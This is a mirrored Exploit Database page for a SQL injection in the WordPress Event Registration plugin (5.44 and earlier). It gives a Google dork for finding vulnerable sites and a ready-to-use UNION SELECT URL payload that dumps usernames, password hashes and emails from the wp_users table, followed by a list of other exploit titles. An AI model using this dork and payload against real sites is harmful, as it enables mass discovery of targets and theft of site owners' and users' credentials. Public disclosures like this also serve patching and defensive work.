WordPress Plugin Event Registration 5.44 – SQL Injection

Exploit Database
16 阅读

作者： serk

日期： 2011-09-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17814/

# Exploit Title: WordPress Event Registration plugin <= 5.44 SQl Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44


[ exploit ]

domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--

last Exploits
WordPress Plugin Event Registration 5.44 – SQL Injection的更多信息

easy-mock 1.6.0 – Remote Code Execution (RCE) (Authenticated)：
WordPress Theme Photocrati 4.x – SQL Injection / Cross-Site Scripting：
vBulletin 2.3.x – SQL Injection：
PHP Melody 3.0 – ‘Multiple’ Cross-Site Scripting (XSS)：
PHP Booking Calendar 10e – ‘page_info_message’ Cross-Site Scripting：
Digital Interchange Document Library – SQL Injection：
RapidLeech Scripts – Arbitrary File Upload：
Itech B2B Script 4.28 – SQL Injection：